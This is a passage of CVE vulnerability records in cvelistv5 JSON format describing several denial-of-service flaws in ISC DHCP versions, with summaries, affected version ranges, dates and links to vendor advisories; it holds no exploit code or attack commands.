              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/175594.html"
            },
            {
              "name": "DSA-3442",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2016/dsa-3442"
            },
            {
              "name": "USN-2868-1",
              "refsource": "UBUNTU",
              "url": "http://www.ubuntu.com/usn/USN-2868-1"
            },
            {
              "name": "FEDORA-2016-adb533a418",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/176031.html"
            },
            {
              "name": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html",
              "refsource": "CONFIRM",
              "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html"
            },
            {
              "name": "80703",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/80703"
            },
            {
              "name": "openSUSE-SU-2016:0601",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00162.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2015-8605",
    "datePublished": "2016-01-14T22:00:00.000Z",
    "dateReserved": "2015-12-17T00:00:00.000Z",
    "dateUpdated": "2024-08-06T08:20:43.591Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2013-2494 (GCVE-0-2013-2494)

Vulnerability from cvelistv5 – Published: 2013-03-28 16:00 – Updated: 2024-09-16 19:52
Summary
libdns in ISC DHCP 4.2.x before 4.2.5-P1 allows remote name servers to cause a denial of service (memory consumption) via vectors involving a regular expression, as demonstrated by a memory-exhaustion attack against a machine running a dhcpd process, a related issue to CVE-2013-2266.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
References

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T15:44:31.973Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://kb.isc.org/article/AA-00880/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "libdns in ISC DHCP 4.2.x before 4.2.5-P1 allows remote name servers to cause a denial of service (memory consumption) via vectors involving a regular expression, as demonstrated by a memory-exhaustion attack against a machine running a dhcpd process, a related issue to CVE-2013-2266."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2013-03-28T16:00:00.000Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://kb.isc.org/article/AA-00880/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2013-2494",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "libdns in ISC DHCP 4.2.x before 4.2.5-P1 allows remote name servers to cause a denial of service (memory consumption) via vectors involving a regular expression, as demonstrated by a memory-exhaustion attack against a machine running a dhcpd process, a related issue to CVE-2013-2266."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://kb.isc.org/article/AA-00880/",
              "refsource": "CONFIRM",
              "url": "https://kb.isc.org/article/AA-00880/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2013-2494",
    "datePublished": "2013-03-28T16:00:00.000Z",
    "dateReserved": "2013-03-07T00:00:00.000Z",
    "dateUpdated": "2024-09-16T19:52:30.979Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2012-3955 (GCVE-0-2012-3955)

Vulnerability from cvelistv5 – Published: 2012-09-14 10:00 – Updated: 2024-08-06 20:21
Summary
ISC DHCP 4.1.x before 4.1-ESV-R7 and 4.2.x before 4.2.4-P2 allows remote attackers to cause a denial of service (daemon crash) in opportunistic circumstances by establishing an IPv6 lease in an environment where the lease expiration time is later reduced.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
References
http://lists.fedoraproject.org/pipermail/package-… vendor-advisory, x_refsource_FEDORA
http://lists.opensuse.org/opensuse-updates/2012-0… vendor-advisory, x_refsource_SUSE
http://www.ubuntu.com/usn/USN-1571-1 vendor-advisory, x_refsource_UBUNTU
http://lists.opensuse.org/opensuse-updates/2012-0… vendor-advisory, x_refsource_SUSE
http://www.debian.org/security/2012/dsa-2551 vendor-advisory, x_refsource_DEBIAN
http://secunia.com/advisories/51318 third-party-advisory, x_refsource_SECUNIA
http://www.mandriva.com/security/advisories?name=… vendor-advisory, x_refsource_MANDRIVA
http://lists.fedoraproject.org/pipermail/package-… vendor-advisory, x_refsource_FEDORA
http://www.securityfocus.com/bid/55530 vdb-entry, x_refsource_BID
http://lists.fedoraproject.org/pipermail/package-… vendor-advisory, x_refsource_FEDORA
http://rhn.redhat.com/errata/RHSA-2013-0504.html vendor-advisory, x_refsource_REDHAT
https://blogs.oracle.com/sunsecurity/entry/cve_20… x_refsource_CONFIRM
http://lists.opensuse.org/opensuse-updates/2012-0… vendor-advisory, x_refsource_SUSE
http://security.gentoo.org/glsa/glsa-201301-06.xml vendor-advisory, x_refsource_GENTOO
https://kb.isc.org/article/AA-00779 x_refsource_CONFIRM
http://www.securitytracker.com/id?1027528 vdb-entry, x_refsource_SECTRACK
Date Public
2012-09-12 00:00

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T20:21:04.060Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "FEDORA-2012-14149",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088220.html"
          },
          {
            "name": "openSUSE-SU-2012:1252",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00103.html"
          },
          {
            "name": "USN-1571-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "http://www.ubuntu.com/usn/USN-1571-1"
          },
          {
            "name": "openSUSE-SU-2012:1234",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00088.html"
          },
          {
            "name": "DSA-2551",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2012/dsa-2551"
          },
          {
            "name": "51318",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/51318"
          },
          {
            "name": "MDVSA-2012:153",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:153"
          },
          {
            "name": "FEDORA-2012-13910",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/086992.html"
          },
          {
            "name": "55530",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/55530"
          },
          {
            "name": "FEDORA-2012-14076",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-October/088882.html"
          },
          {
            "name": "RHSA-2013:0504",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://rhn.redhat.com/errata/RHSA-2013-0504.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2012_3955_denial_of"
          },
          {
            "name": "openSUSE-SU-2012:1254",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00105.html"
          },
          {
            "name": "GLSA-201301-06",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://kb.isc.org/article/AA-00779"
          },
          {
            "name": "1027528",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1027528"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2012-09-12T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "ISC DHCP 4.1.x before 4.1-ESV-R7 and 4.2.x before 4.2.4-P2 allows remote attackers to cause a denial of service (daemon crash) in opportunistic circumstances by establishing an IPv6 lease in an environment where the lease expiration time is later reduced."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2012-09-29T09:00:00.000Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "FEDORA-2012-14149",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088220.html"
        },
        {
          "name": "openSUSE-SU-2012:1252",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00103.html"
        },
        {
          "name": "USN-1571-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "http://www.ubuntu.com/usn/USN-1571-1"
        },
        {
          "name": "openSUSE-SU-2012:1234",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00088.html"
        },
        {
          "name": "DSA-2551",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2012/dsa-2551"
        },
        {
          "name": "51318",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/51318"
        },
        {
          "name": "MDVSA-2012:153",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:153"
        },
        {
          "name": "FEDORA-2012-13910",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/086992.html"
        },
        {
          "name": "55530",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/55530"
        },
        {
          "name": "FEDORA-2012-14076",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-October/088882.html"
        },
        {
          "name": "RHSA-2013:0504",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://rhn.redhat.com/errata/RHSA-2013-0504.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2012_3955_denial_of"
        },
        {
          "name": "openSUSE-SU-2012:1254",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00105.html"
        },
        {
          "name": "GLSA-201301-06",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://kb.isc.org/article/AA-00779"
        },
        {
          "name": "1027528",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1027528"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2012-3955",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "ISC DHCP 4.1.x before 4.1-ESV-R7 and 4.2.x before 4.2.4-P2 allows remote attackers to cause a denial of service (daemon crash) in opportunistic circumstances by establishing an IPv6 lease in an environment where the lease expiration time is later reduced."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "FEDORA-2012-14149",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088220.html"
            },
            {
              "name": "openSUSE-SU-2012:1252",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00103.html"
            },
            {
              "name": "USN-1571-1",
              "refsource": "UBUNTU",
              "url": "http://www.ubuntu.com/usn/USN-1571-1"
            },
            {
              "name": "openSUSE-SU-2012:1234",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00088.html"
            },
            {
              "name": "DSA-2551",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2012/dsa-2551"
            },
            {
              "name": "51318",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/51318"
            },
            {
              "name": "MDVSA-2012:153",
              "refsource": "MANDRIVA",
              "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:153"
            },
            {
              "name": "FEDORA-2012-13910",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/086992.html"
            },
            {
              "name": "55530",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/55530"
            },
            {
              "name": "FEDORA-2012-14076",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-October/088882.html"
            },
            {
              "name": "RHSA-2013:0504",
              "refsource": "REDHAT",
              "url": "http://rhn.redhat.com/errata/RHSA-2013-0504.html"
            },
            {
              "name": "https://blogs.oracle.com/sunsecurity/entry/cve_2012_3955_denial_of",
              "refsource": "CONFIRM",
              "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2012_3955_denial_of"
            },
            {
              "name": "openSUSE-SU-2012:1254",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00105.html"
            },
            {
              "name": "GLSA-201301-06",
              "refsource": "GENTOO",
              "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
            },
            {
              "name": "https://kb.isc.org/article/AA-00779",
              "refsource": "CONFIRM",
              "url": "https://kb.isc.org/article/AA-00779"
            },
            {
              "name": "1027528",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1027528"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2012-3955",
    "datePublished": "2012-09-14T10:00:00.000Z",
    "dateReserved": "2012-07-11T00:00:00.000Z",
    "dateUpdated": "2024-08-06T20:21:04.060Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2012-3571 (GCVE-0-2012-3571)

Vulnerability from cvelistv5 – Published: 2012-07-25 10:00 – Updated: 2024-08-06 20:13
Summary
ISC DHCP 4.1.2 through 4.2.4 and 4.1-ESV before 4.1-ESV-R6 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed client identifier.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
References
http://www.oracle.com/technetwork/topics/security… x_refsource_CONFIRM
https://kb.isc.org/article/AA-00712 x_refsource_CONFIRM
http://www.debian.org/security/2012/dsa-2516 vendor-advisory, x_refsource_DEBIAN
http://rhn.redhat.com/errata/RHSA-2012-1141.html vendor-advisory, x_refsource_REDHAT
http://www.mandriva.com/security/advisories?name=… vendor-advisory, x_refsource_MANDRIVA
http://lists.opensuse.org/opensuse-updates/2012-0… vendor-advisory, x_refsource_SUSE
http://kb.juniper.net/InfoCenter/index?page=conte… x_refsource_CONFIRM
http://www.mandriva.com/security/advisories?name=… vendor-advisory, x_refsource_MANDRIVA
http://www.debian.org/security/2012/dsa-2519 vendor-advisory, x_refsource_DEBIAN
http://www.ubuntu.com/usn/USN-1519-1 vendor-advisory, x_refsource_UBUNTU
http://security.gentoo.org/glsa/glsa-201301-06.xml vendor-advisory, x_refsource_GENTOO
http://rhn.redhat.com/errata/RHSA-2012-1140.html vendor-advisory, x_refsource_REDHAT
http://www.securityfocus.com/bid/54665 vdb-entry, x_refsource_BID
Date Public
2012-07-24 00:00

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T20:13:51.326Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://kb.isc.org/article/AA-00712"
          },
          {
            "name": "DSA-2516",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2012/dsa-2516"
          },
          {
            "name": "RHSA-2012:1141",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
          },
          {
            "name": "MDVSA-2012:116",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
          },
          {
            "name": "openSUSE-SU-2012:1006",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10761"
          },
          {
            "name": "MDVSA-2012:115",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
          },
          {
            "name": "DSA-2519",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2012/dsa-2519"
          },
          {
            "name": "USN-1519-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "http://www.ubuntu.com/usn/USN-1519-1"
          },
          {
            "name": "GLSA-201301-06",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
          },
          {
            "name": "RHSA-2012:1140",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://rhn.redhat.com/errata/RHSA-2012-1140.html"
          },
          {
            "name": "54665",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/54665"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2012-07-24T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "ISC DHCP 4.1.2 through 4.2.4 and 4.1-ESV before 4.1-ESV-R6 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed client identifier."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-12-29T21:57:01.000Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://kb.isc.org/article/AA-00712"
        },
        {
          "name": "DSA-2516",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2012/dsa-2516"
        },
        {
          "name": "RHSA-2012:1141",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
        },
        {
          "name": "MDVSA-2012:116",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
        },
        {
          "name": "openSUSE-SU-2012:1006",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10761"
        },
        {
          "name": "MDVSA-2012:115",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
        },
        {
          "name": "DSA-2519",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2012/dsa-2519"
        },
        {
          "name": "USN-1519-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "http://www.ubuntu.com/usn/USN-1519-1"
        },
        {
          "name": "GLSA-201301-06",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
        },
        {
          "name": "RHSA-2012:1140",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://rhn.redhat.com/errata/RHSA-2012-1140.html"
        },
        {
          "name": "54665",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/54665"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2012-3571",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "ISC DHCP 4.1.2 through 4.2.4 and 4.1-ESV before 4.1-ESV-R6 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed client identifier."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html",
              "refsource": "CONFIRM",
              "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
            },
            {
              "name": "https://kb.isc.org/article/AA-00712",
              "refsource": "CONFIRM",
              "url": "https://kb.isc.org/article/AA-00712"
            },
            {
              "name": "DSA-2516",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2012/dsa-2516"
            },
            {
              "name": "RHSA-2012:1141",
              "refsource": "REDHAT",
              "url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
            },
            {
              "name": "MDVSA-2012:116",
              "refsource": "MANDRIVA",
              "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
            },
            {
              "name": "openSUSE-SU-2012:1006",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
            },
            {
              "name": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10761",
              "refsource": "CONFIRM",
              "url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10761"
            },
            {
              "name": "MDVSA-2012:115",
              "refsource": "MANDRIVA",
              "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
            },
            {
              "name": "DSA-2519",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2012/dsa-2519"
            },
            {
              "name": "USN-1519-1",
              "refsource": "UBUNTU",
              "url": "http://www.ubuntu.com/usn/USN-1519-1"
            },
            {
              "name": "GLSA-201301-06",
              "refsource": "GENTOO",
              "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
            },
            {
              "name": "RHSA-2012:1140",
              "refsource": "REDHAT",
              "url": "http://rhn.redhat.com/errata/RHSA-2012-1140.html"
            },
            {
              "name": "54665",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/54665"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2012-3571",
    "datePublished": "2012-07-25T10:00:00.000Z",
    "dateReserved": "2012-06-14T00:00:00.000Z",
    "dateUpdated": "2024-08-06T20:13:51.326Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2012-3570 (GCVE-0-2012-3570)

Vulnerability from cvelistv5 – Published: 2012-07-25 10:00 – Updated: 2024-08-06 20:13
Summary
Buffer overflow in ISC DHCP 4.2.x before 4.2.4-P1, when DHCPv6 mode is enabled, allows remote attackers to cause a denial of service (segmentation fault and daemon exit) via a crafted client identifier parameter.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
References
http://lists.opensuse.org/opensuse-updates/2012-0… vendor-advisory, x_refsource_SUSE
http://www.mandriva.com/security/advisories?name=… vendor-advisory, x_refsource_MANDRIVA
http://security.gentoo.org/glsa/glsa-201301-06.xml vendor-advisory, x_refsource_GENTOO
https://kb.isc.org/article/AA-00714 x_refsource_CONFIRM
http://www.securityfocus.com/bid/54665 vdb-entry, x_refsource_BID
Date Public
2012-07-24 00:00

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T20:13:50.567Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "openSUSE-SU-2012:1006",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
          },
          {
            "name": "MDVSA-2012:115",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
          },
          {
            "name": "GLSA-201301-06",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://kb.isc.org/article/AA-00714"
          },
          {
            "name": "54665",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/54665"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
